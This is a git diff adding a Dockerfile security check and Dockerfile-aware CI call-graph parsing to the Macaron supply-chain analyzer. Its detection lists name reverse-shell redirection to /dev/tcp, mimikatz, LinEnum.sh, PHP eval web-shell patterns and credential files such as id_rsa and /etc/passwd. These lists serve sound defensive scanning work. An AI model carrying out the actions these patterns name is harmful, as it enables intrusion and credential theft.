diff --git a/pyproject.toml b/pyproject.toml index 74705364b..ce77300f3 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -38,6 +38,7 @@ dependencies = [ "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", "semgrep == 1.113.0", + "dockerfile-parse >= 2.0.1" ] keywords = [] # https://pypi.org/classifiers/ @@ -79,6 +80,7 @@ dev = [ "pylint >=3.0.3,<4.0.0", "cyclonedx-bom >=4.0.0,<5.0.0", "types-beautifulsoup4 >= 4.12.0,<5.0.0", + "types-dockerfile-parse >= 2.0.0" ] docs = [ "sphinx >=8.0.0,<9.0.0", diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py index ccd61cca1..ebfcd62b3 100644 --- a/src/macaron/slsa_analyzer/checks/build_script_check.py +++ b/src/macaron/slsa_analyzer/checks/build_script_check.py @@ -107,12 +107,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # we parse bash scripts that are reachable through CI only. result_tables: list[CheckFacts] = [] ci_services = ctx.dynamic_data["ci_services"] + for tool in build_tools: for ci_info in ci_services: ci_service: BaseCIService = ci_info["service"] # Checking if a CI service is discovered for this repo. if isinstance(ci_service, NoneCIService): continue + + # Process regular workflow build commands try: for build_command in ci_service.get_build_tool_commands( callgraph=ci_info["callgraph"], build_tool=tool @@ -148,6 +151,38 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: except CallGraphError as error: logger.debug(error) + # Process Docker build commands if the CI service has the method + if hasattr(ci_service, "get_docker_build_commands"): + try: + for build_command in ci_service.get_docker_build_commands( + callgraph=ci_info["callgraph"], build_tool=tool + ): + logger.debug("Processing Docker build command %s", build_command) + # For Dockerfile, link to the Dockerfile itself + relative_path = os.path.relpath(build_command["ci_path"], ctx.component.repository.fs_path) + trigger_link = ci_service.api_client.get_file_link( + ctx.component.repository.full_name, + ctx.component.repository.commit_sha, + relative_path, + ) + logger.debug("Trigger link for Docker build command: %s", trigger_link) + + result_tables.append( + BuildScriptFacts( + build_tool_name=tool.name, + ci_service_name=ci_service.name, + build_trigger=trigger_link, + language=build_command["language"], + language_distributions=None, + language_versions=None, + language_url=None, + build_tool_command=tool.serialize_to_json(build_command["command"]), + confidence=Confidence.HIGH, + ) + ) + except CallGraphError as error: + logger.debug(error) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.PASSED) diff --git a/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..aa6710792 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py @@ -0,0 +1,616 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +"""This module contains the DockerfileSecurityCheck class with security analysis based on DFScan research.""" + +import json +import logging +import os +import re +from io import StringIO + +from dockerfile_parse import DockerfileParser +from sqlalchemy import ForeignKey, Integer, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonDict +from macaron.database.table_definitions import CheckFacts +from macaron.json_tools import JsonType +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class DockerfileSecurityFacts(CheckFacts): + """The ORM mapping for justifications in dockerfile security check.""" + + __tablename__ = "_dockerfile_security_check" + + #: The primary key. + id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The name of the base image used in the Dockerfile. + base_image_name: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.TEXT}) + + #: The version of the base image used in the Dockerfile. + base_image_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security vulnerabilities found in the Dockerfile. + security_issues: Mapped[dict[str, JsonType]] = mapped_column( + DBJsonDict, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security risk score (0-100, higher is more risky). + risk_score: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + #: Number of security issues found. 
+ issues_count: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + __mapper_args__ = { + "polymorphic_identity": "dockerfile_security_check", + } + + +class DockerfileSecurityAnalyzer: + """Security analyzer for Dockerfiles based on DFScan research.""" + + # Security rules from DFScan research + RISKY_PORTS = [21, 22, 23, 3306] + PRIVILEGED_PORTS = list(range(1, 1024)) + SAFE_PRIVILEGED_PORTS = [80, 443] + + SENSITIVE_ENV_KEYWORDS = ["pass", "pswd", "license", "token", "session", "KEY", "AUTHORIZED", "secret"] + + EMAIL_REGEX = re.compile(r"[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+") + + UNSAFE_VOLUMES = [ + "/proc", + "/", + "/root/.ssh", + "/var/run/docker.sock", + "/var/lib/docker", + "/etc/docker", + "Docker.service", + "Docker.socket", + "/etc/default/docker", + "/etc/docker/daemon.JSON", + "/etc/sysconfig/docker", + "/usr/bin/containerd", + "/usr/sbin/runc", + ] + + SENSITIVE_FILES = [ + "NOTICE", + "README.md", + "LICENSE", + "AUTHORS.md", + "CONTRIBUTING.md", + ".vscode/", + "vendor/", + "env/", + "ENV/", + "build/", + "dist/", + "target/", + "downloads/", + "eggs/", + ".eggs/", + "lib/", + "lib64/", + "parts/", + "sdist/", + "var/", + "Dockerfile", + ".git", + ".editorconfig", + "*.egg-info/", + ".installed.cfg", + "*.egg", + "*.manifest", + "*.spec", + ".gcloudignore", + ".gitignore", + ".tox/", + ".dockerignore", + ".coverage", + ".coverage.*", + ".cache", + "htmlcov/", + "nosetests.xml", + "coverage.xml", + "*,cover", + ".hypothesis/", + "ssh/", + "id_rsa", + ".git-credentials", + "config.*", + ] + + SECURITY_CRITICAL_FILES = [ + "id_rsa", + "id_rsa.pub", + ".ssh", + "shadow", + "/etc/passwd", + "/etc/group", + "/etc/profile", + ".bash_history", + ".history", + ".log", + ".conf", + ] + + MALICIOUS_RUN_PATTERNS = [ + r">&/dev/tcp/", + r"&>/dev/tcp", + r"crontab", + r"LinEnum\.sh", + r"mimikatz", + r"@eval\(\$_POST", + r"@eval\(\$_GET", + r"@eval\(\$_REQUEST", + r"chmod 777", + ] + + def __init__(self) -> None: + """Initialize the analyzer.""" + self.issues: list[dict[str, str]] = [] + self.risk_score: int = 0 + + def analyze_dockerfile_content(self, dockerfile_content: str) -> tuple[list[dict[str, str]], int, str, str]: + """ + Analyze Dockerfile content for security issues. 
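+
+        Each supported instruction (FROM, USER, EXPOSE, ENV, VOLUME, COPY, ADD and RUN)
+        is checked against the DFScan rule set, and every finding adds risk points to
+        the total score.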
+ + Parameters + ---------- + dockerfile_content : str + Content of the Dockerfile as string + + Returns + ------- + tuple[list[dict[str, str]], int, str, str] + tuple of (issues_list, risk_score, base_image_name, base_image_version) + """ + self.issues = [] + self.risk_score = 0 + + base_image_name = "unknown" + base_image_version = "unknown" + + try: + # Use dockerfile-parse with fileobj argument + dockerfile_fileobj = StringIO(dockerfile_content) + parser = DockerfileParser(fileobj=dockerfile_fileobj) + + # Extract base image info + base_image_name, base_image_version = self._get_base_image_info(parser) + + # Parse the structure + structure = parser.structure + + for item in structure: + instruction_type = item.get("instruction", "").upper() + instruction_value = item.get("value", "") + + if instruction_type == "FROM": + self._check_from_instruction(instruction_value) + elif instruction_type == "USER": + self._check_user_instruction(instruction_value) + elif instruction_type == "EXPOSE": + self._check_expose_instruction(instruction_value) + elif instruction_type == "ENV": + self._check_env_instruction(instruction_value) + elif instruction_type == "VOLUME": + self._check_volume_instruction(instruction_value) + elif instruction_type == "COPY": + self._check_copy_instruction(instruction_value) + elif instruction_type == "ADD": + self._check_add_instruction(instruction_value) + elif instruction_type == "RUN": + self._check_run_instruction(instruction_value) + + except json.JSONDecodeError as e: + logger.error("Error parsing Dockerfile: %s", e) + self._add_issue("ERROR", "PARSE", f"Failed to parse Dockerfile: {str(e)}", 5) + + return self.issues, self.risk_score, base_image_name, base_image_version + + def _get_base_image_info(self, parser: DockerfileParser) -> tuple[str, str]: + """ + Extract base image name and version from DockerfileParser. 
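+
+        When the image reference carries no explicit tag, the version defaults to "latest".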
+
+        Parameters
+        ----------
+        parser : DockerfileParser
+            The dockerfile parser instance
+
+        Returns
+        -------
+        tuple[str, str]
+            tuple of (image_name, image_version)
+        """
+        try:
+            # Get the base image
+            base_image = parser.baseimage
+            if base_image:
+                # Split image name and tag
+                if ":" in base_image:
+                    image_name, image_version = base_image.split(":", 1)
+                else:
+                    image_name = base_image
+                    image_version = "latest"
+                return image_name, image_version
+
+        except AttributeError as e:
+            logger.debug("Error extracting base image info: %s", e)
+
+        return "unknown", "unknown"
+
+    def _add_issue(self, severity: str, instruction: str, issue: str, risk_points: int = 0) -> None:
+        """Add a security issue to the results."""
+        self.issues.append(
+            {"severity": severity, "instruction": instruction, "issue": issue, "risk_points": str(risk_points)}
+        )
+        self.risk_score += risk_points
+
+    def _check_from_instruction(self, content: str) -> None:
+        """Check FROM instruction for security issues."""
+        # Extract image name and tag
+        image_parts = content.split(":")
+        image_name = image_parts[0]
+        tag = image_parts[1] if len(image_parts) > 1 else "latest"
+
+        # Check for latest tag usage
+        if tag == "latest" or len(image_parts) == 1:
+            self._add_issue(
+                "MEDIUM", "FROM", f"Using 'latest' tag or no tag specified for base image: {image_name}", 15
+            )
+
+        # Check for old base image (simplified - would need Docker Hub API integration)
+        self._check_base_image_age(image_name, tag)
+
+    def _check_base_image_age(self, image_name: str, tag: str) -> None:
+        """Check if base image is too old (simplified implementation)."""
+        # This would require Docker Hub API integration.
+        # For now, just warn about common old tags.
+        old_patterns = ["ubuntu:14.04", "ubuntu:16.04", "centos:6", "centos:7", "python:2.7"]
+        full_image = f"{image_name}:{tag}"
+
+        for old_pattern in old_patterns:
+            if old_pattern in full_image:
+                self._add_issue("HIGH", "FROM", f"Using potentially outdated base image: {full_image}", 25)
+                break
+
+    def _check_user_instruction(self, content: str) -> None:
+        """Check USER instruction for root usage."""
+        if content.strip().lower() in {"root", "0"}:
+            self._add_issue("HIGH", "USER", "Running container as root user poses security risks", 30)
+
+    def _check_expose_instruction(self, content: str) -> None:
+        """Check EXPOSE instruction for risky ports."""
+        try:
+            # Handle both space-separated and single port formats
+            port_strings = content.split()
+            ports: list[int] = []
+
+            for port_str in port_strings:
+                # Handle port ranges and protocols (e.g., "8080/tcp")
+                port_str = port_str.split("/")[0]  # Remove protocol if present
+                if "-" in port_str:
+                    # Handle port ranges
+                    start_port, end_port = port_str.split("-")
+                    ports.extend(range(int(start_port), int(end_port) + 1))
+                else:
+                    ports.append(int(port_str))
+
+            for port in ports:
+                if port in self.RISKY_PORTS:
+                    self._add_issue("HIGH", "EXPOSE", f"Exposing risky port {port} (SSH/FTP/MySQL/Telnet)", 25)
+                elif port in self.PRIVILEGED_PORTS and port not in self.SAFE_PRIVILEGED_PORTS:
+                    self._add_issue("MEDIUM", "EXPOSE", f"Exposing privileged port {port}", 15)
+        except (ValueError, AttributeError) as e:
+            logger.debug("Could not parse ports from EXPOSE instruction: %s", e)
+
+    def _check_env_instruction(self, content: str) -> None:
+        """Check ENV instruction for sensitive information."""
+        # Check for sensitive keywords
+        content_lower = content.lower()
+        for keyword in self.SENSITIVE_ENV_KEYWORDS:
+            if keyword.lower() in content_lower:
+                self._add_issue(
+                    "HIGH", "ENV", f"Potentially sensitive information in environment variable: {keyword}", 20
+                )
+
+        # Check for email addresses
+        if self.EMAIL_REGEX.search(content):
+            self._add_issue("MEDIUM", "ENV", "Email address found in environment variable", 10)
+
+    def _check_volume_instruction(self, content: str) -> None:
+        """Check VOLUME instruction for unsafe mounts."""
+        # Parse volume instruction - can be JSON array or space-separated
+        volumes = []
+
+        if content.strip().startswith("["):
+            # JSON array format
+            try:
+                volumes = json.loads(content)
+            except json.JSONDecodeError:
+                # Fallback to string parsing
+                volumes = [v.strip().strip("\"'") for v in content.strip("[]").split(",")]
+        else:
+            # Space-separated format
+            volumes = [v.strip().strip("\"'") for v in content.split()]
+
+        for volume in volumes:
+            volume_lower = volume.lower()
+            for unsafe_vol in self.UNSAFE_VOLUMES:
+                unsafe_lower = unsafe_vol.lower()
+                # Match exactly or as a parent directory. A plain startswith() would make
+                # the "/" entry flag every absolute mount path. The comparison is
+                # case-insensitive so entries such as "/etc/docker/daemon.JSON" match.
+                if volume_lower == unsafe_lower or (
+                    unsafe_lower != "/" and volume_lower.startswith(unsafe_lower.rstrip("/") + "/")
+                ):
+                    self._add_issue("CRITICAL", "VOLUME", f"Unsafe volume mount detected: {volume}", 40)
+                    break
+
+    def _check_copy_instruction(self, content: str) -> None:
+        """Check COPY instruction for sensitive files."""
+        # Parse COPY instruction arguments
+        parts = content.split()
+        if not parts:
+            return
+
+        # COPY can have multiple sources, last argument is destination
+        sources = parts[:-1] if len(parts) > 1 else parts
+
+        for source in sources:
+            # Check for wildcard usage
+            if source == ".":
+                self._add_issue(
+                    "MEDIUM", "COPY", "Using '.' as source copies entire build context including sensitive files", 15
+                )
+
+            # Check for sensitive files
+            self._check_file_sensitivity("COPY", source)
+
+    def _check_add_instruction(self, content: str) -> None:
+        """Check ADD instruction for security issues."""
+        parts = content.split()
+        if not parts:
+            return
+
+        # ADD can have multiple sources, last argument is destination
+        sources = parts[:-1] if len(parts) > 1 else parts
+
+        for source in sources:
+            # Check for URL usage
+            if source.startswith(("http://", "https://", "ftp://")):
+                self._add_issue("HIGH", "ADD", f"ADD instruction downloading from URL: {source}", 25)
+
+            # Check for compressed files
+            if any(source.endswith(ext) for ext in [".tar", ".tar.gz", ".tgz", ".zip"]):
+                self._add_issue("MEDIUM", "ADD", f"ADD instruction with compressed file: {source}", 15)
+
+            # Same checks as COPY
+            if source == ".":
+                self._add_issue(
+                    "MEDIUM", "ADD", "Using '.' as source copies entire build context including sensitive files", 15
+                )
+
+            self._check_file_sensitivity("ADD", source)
+
+    def _check_file_sensitivity(self, instruction: str, filepath: str) -> None:
+        """Check if file path contains sensitive information."""
+        for sensitive_file in self.SENSITIVE_FILES:
+            if sensitive_file in filepath:
+                self._add_issue("MEDIUM", instruction, f"Potentially sensitive file being copied: {filepath}", 10)
+                break
+
+        for critical_file in self.SECURITY_CRITICAL_FILES:
+            if critical_file in filepath:
+                self._add_issue("CRITICAL", instruction, f"Security-critical file being copied: {filepath}", 35)
+                break
+
+    def _check_run_instruction(self, content: str) -> None:
+        """Check RUN instruction for malicious commands."""
+        for pattern in self.MALICIOUS_RUN_PATTERNS:
+            if re.search(pattern, content, re.IGNORECASE):
+                self._add_issue("CRITICAL", "RUN", f"Potentially malicious command detected: {pattern}", 40)
+
+
+class DockerfileSecurityCheck(BaseCheck):
+    """This check analyzes Dockerfiles for security vulnerabilities based on DFScan research."""
+
+    def __init__(self) -> None:
+        """Initialize instance."""
+        check_id = "mcn_dockerfile_security_1"
+        description = """This check analyzes Dockerfiles for security vulnerabilities and best practices
+        based on DFScan research findings. It examines Docker instructions for potential security risks
+        including root user usage, risky port exposure, sensitive information leakage, unsafe volume mounts,
+        and malicious commands."""
+        depends_on: list[tuple[str, CheckResultType]] = []
+        eval_reqs = [ReqName.SCRIPTED_BUILD]
+        super().__init__(
+            check_id=check_id,
+            description=description,
+            depends_on=depends_on,
+            eval_reqs=eval_reqs,
+            result_on_skip=CheckResultType.FAILED,
+        )
+
+    def run_check(self, ctx: AnalyzeContext) -> CheckResultData:
+        """
+        Implement the check in this method.
+
+        Parameters
+        ----------
+        ctx : AnalyzeContext
+            The object containing processed data for the target repo.
+
+        Returns
+        -------
+        CheckResultData
+            The result of the check.
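+            The result type and confidence are derived from the aggregated risk score.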
+ """ + result_tables: list[CheckFacts] = [] + + try: + # Find and read Dockerfile content + dockerfile_content = self._get_dockerfile_content(ctx) + if not dockerfile_content: + logger.debug("No Dockerfile found in repository") + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.FAILED) + + # Analyze the Dockerfile + analyzer = DockerfileSecurityAnalyzer() + issues, risk_score, base_image_name, base_image_version = analyzer.analyze_dockerfile_content( + dockerfile_content + ) + + # Determine confidence and result type based on risk score and issues + if risk_score >= 100: + result_type = CheckResultType.FAILED + confidence = Confidence.HIGH + elif risk_score >= 50: + result_type = CheckResultType.FAILED + confidence = Confidence.MEDIUM + elif risk_score > 0: + result_type = CheckResultType.PASSED + confidence = Confidence.MEDIUM + else: + result_type = CheckResultType.PASSED + confidence = Confidence.HIGH + + # Create detailed security issues dictionary + security_issues_dict = { + "total_issues": len(issues), + "risk_score": risk_score, + "issues_by_severity": {}, + "issues_by_instruction": {}, + "detailed_issues": issues, + } + + # Group issues by severity and instruction + for issue in issues: + severity = issue.get("severity", "UNKNOWN") + instruction = issue.get("instruction", "UNKNOWN") + + # Ensure the dicts are actually dicts before using 'in' + if not isinstance(security_issues_dict.get("issues_by_severity"), dict): + security_issues_dict["issues_by_severity"] = {} + if not isinstance(security_issues_dict.get("issues_by_instruction"), dict): + security_issues_dict["issues_by_instruction"] = {} + + issues_by_severity = security_issues_dict.get("issues_by_severity") + issues_by_instruction = security_issues_dict.get("issues_by_instruction") + + if not isinstance(issues_by_severity, dict): + issues_by_severity = {} + security_issues_dict["issues_by_severity"] = issues_by_severity + if not isinstance(issues_by_instruction, dict): + issues_by_instruction = {} + security_issues_dict["issues_by_instruction"] = issues_by_instruction + + if severity not in issues_by_severity: + issues_by_severity[severity] = 0 + issues_by_severity[severity] += 1 + + if instruction not in issues_by_instruction: + issues_by_instruction[instruction] = 0 + issues_by_instruction[instruction] += 1 + + # Create facts + facts = DockerfileSecurityFacts( + base_image_name=base_image_name, + base_image_version=base_image_version, + security_issues=security_issues_dict, + risk_score=risk_score, + issues_count=len(issues), + confidence=confidence, + ) + + result_tables.append(facts) + + return CheckResultData( + result_tables=result_tables, + result_type=result_type, + ) + + except (OSError, ValueError) as e: + logger.error("Error processing Dockerfile security check: %s", e) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.UNKNOWN) + + def _get_dockerfile_content(self, ctx: AnalyzeContext) -> str | None: + """ + Get Dockerfile content from the repository. 
+
+        Parameters
+        ----------
+        ctx : AnalyzeContext
+            The analyze context containing repository information
+
+        Returns
+        -------
+        str | None
+            The Dockerfile content as string, or None if not found
+        """
+        # Resolve the local file system path of the repository, if one is available.
+        repo_path = None
+        if (
+            hasattr(ctx, "component")
+            and ctx.component
+            and hasattr(ctx.component, "repository")
+            and ctx.component.repository
+            and hasattr(ctx.component.repository, "fs_path")
+        ):
+            repo_path = ctx.component.repository.fs_path
+            logger.debug("Found repo_path via component.repository.fs_path: %s", repo_path)
+
+        # Common Dockerfile names
+        dockerfile_names = ["Dockerfile", "dockerfile", "Dockerfile.prod", "Dockerfile.dev"]
+
+        # Ensure repo_path is not None before proceeding
+        if repo_path is None:
+            logger.debug("repo_path is None, cannot search for Dockerfile.")
+            return None
+
+        # Check root directory first
+        for dockerfile_name in dockerfile_names:
+            dockerfile_path = os.path.join(repo_path, dockerfile_name)
+            if os.path.exists(dockerfile_path):
+                try:
+                    with open(dockerfile_path, encoding="utf-8") as f:
+                        content = f.read()
+                        logger.info("Found Dockerfile at: %s", dockerfile_path)
+                        return content
+                except (OSError, UnicodeDecodeError) as e:
+                    logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e)
+
+        # Search recursively for Dockerfiles (limit depth to avoid deep recursion)
+        max_depth = 3
+        for root, dirs, files in os.walk(repo_path):
+            # Calculate current depth
+            depth = root[len(repo_path) :].count(os.sep)
+            if depth >= max_depth:
+                dirs[:] = []  # Don't recurse deeper
+                continue
+
+            # Skip hidden directories and common non-source directories
+            dirs[:] = [d for d in dirs if not d.startswith(".") and d not in ["node_modules", "venv", "env"]]
+
+            for file in files:
+                if file.lower().startswith("dockerfile"):
+                    dockerfile_path = os.path.join(root, file)
+                    try:
+                        with open(dockerfile_path, encoding="utf-8") as f:
+                            content = f.read()
+                            logger.info("Found Dockerfile at: %s", dockerfile_path)
+                            return content
+                    except (OSError, UnicodeDecodeError) as e:
+                        logger.debug("Error reading Dockerfile %s: %s", dockerfile_path, e)
+
+        logger.info("No Dockerfile found in repository at path: %s", repo_path)
+        return None
+
+
+registry.register(DockerfileSecurityCheck())
diff --git a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
index adaa3ce95..a6372c189 100644
--- a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
+++ b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
@@ -280,6 +280,24 @@ def get_third_party_configurations(self) -> list[str]:
         """
         return []
 
+    def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]:
+        """
+        Traverse the callgraph and find all the reachable Docker build commands.
+
+        Parameters
+        ----------
+        callgraph: CallGraph
+            The callgraph reachable from the CI workflows.
+        build_tool: BaseBuildTool
+            The corresponding build tool for which Docker build commands need to be detected.
+
+        Yields
+        ------
+        BuildToolCommand
+            The object that contains the Docker build command as well as useful contextual information.
+        """
+        # By default we assume that there is no Docker build command available for a CI service.
+        # Each CI service should override this method if a Docker build command is generated for it.
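+        # Callers (e.g., the build script check) are expected to catch the CallGraphError raised here.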
+        raise CallGraphError("There is no Docker build command for this CI service.")
+
 
 class NoneCIService(BaseCIService):
     """This class can be used to initialize an empty CI service."""
diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
index 4565c2098..16b9afaad 100644
--- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
+++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
@@ -11,6 +11,8 @@
 from enum import Enum
 from typing import Any, TypeGuard, cast
 
+from dockerfile_parse import DockerfileParser
+
 from macaron.code_analyzer.call_graph import BaseNode
 from macaron.config.global_config import global_config
 from macaron.errors import CallGraphError, GitHubActionsValueError, ParseError
@@ -23,6 +25,7 @@
     Job,
     NormalJob,
     ReusableWorkflowCallJob,
+    RunStep,
     Step,
     Workflow,
     is_action_step,
@@ -120,6 +123,39 @@ def __str__(self) -> str:
         return f"GitHubJobNode({self.name})"
 
 
+class DockerNode(BaseNode):
+    """This class represents a callgraph node for when a Dockerfile is used as a build tool."""
+
+    def __init__(
+        self,
+        caller: BaseNode,
+        dockerfile_path: str,
+        node_id: str | None = None,
+    ) -> None:
+        """Initialize instance.
+
+        Parameters
+        ----------
+        caller : BaseNode
+            The caller node.
+        dockerfile_path : str
+            The path to the Dockerfile.
+        node_id : str | None
+            The unique identifier of a node in the callgraph.
+        """
+        super().__init__(
+            caller=caller,
+            node_id=node_id,
+        )
+        self.dockerfile_path = dockerfile_path
+        # Note: callers are responsible for attaching this node to the caller's
+        # callee list via add_callee(), matching the other node types in this module.
+
+
 def is_parsed_obj_workflow(
     parsed_obj: Workflow | Identified[ReusableWorkflowCallJob] | ActionStep,
 ) -> TypeGuard[Workflow]:
@@ -277,16 +313,117 @@ def find_language_setup_action(job_node: GitHubJobNode, lang_name: BuildLanguage
     return None
 
 
-def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None:
-    """Analyze the GitHub Actions node to build the call graph.
+def find_dockerfile_from_job(job_node: GitHubJobNode, repo_path: str) -> str | None:
+    """
+    Find the Dockerfile used in a GitHub Actions job.
 
     Parameters
     ----------
-    node : GitHubWorkflowNode
-        The node for a single GitHub Actions workflow.
+    job_node: GitHubJobNode
+        The target GitHub Actions job node.
     repo_path: str
-        The file system path to the repo.
+        The path to the target repository.
+
+    Returns
+    -------
+    str | None
+        The path to the Dockerfile or None if not found.
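+        Relative paths extracted from the workflow file are resolved against repo_path.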
""" + logger.info("Finding Dockerfile in job node: %s", job_node.name) + # Get steps directly from the job node's parsed object + steps = job_node.parsed_obj.obj.get("steps", []) + if isinstance(steps, list): + for step in steps: + # Handle 'run' steps with docker build command + if not is_action_step(step) and "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract --file or -f argument + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + # Check if the Dockerfile path is absolute or relative + logger.debug("dockerfile_path in run step: %s", dockerfile_path) + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + return dockerfile_path + + # Handle 'uses' steps with docker-related actions + if "uses" in step: + uses_action = step["uses"] + # Check for docker/build-push-action or similar + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", # Variations I found the most common + ] + ): + # Check if there's a 'with' section + if "with" in step: + with_section = step["with"] + + # Check for 'file' parameter (Dockerfile path) + if "file" in with_section: + dockerfile_path = with_section["file"] + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + + # Check for 'context' parameter (might have Dockerfile in that directory) + if "context" in with_section and "file" not in with_section: + context_path = with_section["context"] + # Default to Dockerfile in the context directory + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + if os.path.exists(dockerfile_path): + return dockerfile_path + + # If no file specified, check for default Dockerfile + default_dockerfile = os.path.join(repo_path, "Dockerfile") + if os.path.exists(default_dockerfile): + logger.debug("Using default Dockerfile location") + return default_dockerfile + + return None + + +def parse_run_commands(dockerfile_path: str) -> list[str]: + """Parse the RUN commands from a Dockerfile. + + Parameters + ---------- + dockerfile_path: str + The path to the Dockerfile. + + Returns + ------- + list[str] + A list of RUN commands found in the Dockerfile. + """ + try: + run_cmds = [] + with open(dockerfile_path, encoding="utf-8") as dockerfile: + dfp = DockerfileParser(fileobj=dockerfile) + for instruction in dfp.structure: + if instruction["instruction"] == "RUN": + run_cmds.append(instruction["value"]) + return run_cmds + except Exception as error: + raise CallGraphError(f"Error parsing Dockerfile at {dockerfile_path}: {error}") from error + + +def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: + """Analyze the GitHub Actions node to build the call graph.""" if not is_parsed_obj_workflow(node.parsed_obj): return jobs = node.parsed_obj["jobs"] @@ -296,13 +433,102 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None node.add_callee(job_node) if is_normal_job(job): - # Add third-party workflows. 
-            steps = job.get("steps")
-            if steps is None:
+            # Process steps
+            steps = job_node.parsed_obj.obj.get("steps")
+            if not isinstance(steps, list):
                 continue
-            for step in steps:
+
+            for step_idx, step in enumerate(steps):
+                # First check if this step uses Docker
+                dockerfile_path = None
+                step_id = step.get("id", f"step_{step_idx}")
+
+                # Check for Docker usage in this specific step
+                if "run" in step:
+                    run_cmd = step["run"]
+                    if "docker build" in run_cmd:
+                        # Extract Dockerfile path from docker build command
+                        match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd)
+                        if match:
+                            dockerfile_path = match.group(1)
+                            dockerfile_path = (
+                                os.path.join(repo_path, dockerfile_path)
+                                if not os.path.isabs(dockerfile_path)
+                                else dockerfile_path
+                            )
+                        else:
+                            # Default to 'Dockerfile' in the build context
+                            context_match = re.search(r"docker build\s+([^\s]+)", run_cmd)
+                            context_path = context_match.group(1) if context_match else "."
+                            dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile")
+
+                elif "uses" in step:
+                    uses_action = step["uses"]
+                    # Check for docker-related actions
+                    if any(
+                        docker_action in uses_action
+                        for docker_action in [
+                            "docker/build-push-action",
+                            "docker/setup-buildx-action",
+                            "docker-build-push",
+                        ]
+                    ):
+                        if "with" in step:
+                            with_section = step["with"]
+                            if "file" in with_section:
+                                dockerfile_path = str(with_section["file"])
+                                dockerfile_path = (
+                                    os.path.join(repo_path, dockerfile_path)
+                                    if not os.path.isabs(dockerfile_path)
+                                    else dockerfile_path
+                                )
+
+                # If we found a Dockerfile, process it
+                if dockerfile_path:
+                    # Create a DockerNode for this step
+                    docker_node = DockerNode(
+                        node_id=f"{job_name}_{step_id}_docker",
+                        caller=job_node,
+                        dockerfile_path=dockerfile_path,
+                    )
+                    job_node.add_callee(docker_node)
+                    logger.info("Created DockerNode with id: %s", docker_node.node_id)
+
+                    # Parse RUN commands from Dockerfile
+                    try:
+                        run_cmds = parse_run_commands(dockerfile_path)
+                        logger.info("RUN commands found in Dockerfile %s: %s", dockerfile_path, run_cmds)
+
+                        for run_idx, docker_run_cmd in enumerate(run_cmds):
+                            try:
+                                # Create a minimal step AST that contains the run command
+                                docker_step_ast = RunStep(run=docker_run_cmd)
+
+                                docker_bash_node = create_bash_node(
+                                    name="Dockerfile-RUN",
+                                    node_id=f"{job_name}_{step_id}_docker_run_{run_idx}",
+                                    node_type=BashScriptType.INLINE,
+                                    source_path=dockerfile_path,
+                                    ci_step_ast=docker_step_ast,
+                                    repo_path=repo_path,
+                                    caller=docker_node,
+                                    recursion_depth=0,
+                                )
+                                docker_node.add_callee(docker_bash_node)
+                            except CallGraphError as error:
+                                logger.error("Error creating BashNode for Dockerfile RUN command %s", error)
+                    except CallGraphError as error:
+                        logger.error("Error parsing Dockerfile at %s: %s", dockerfile_path, error)
+
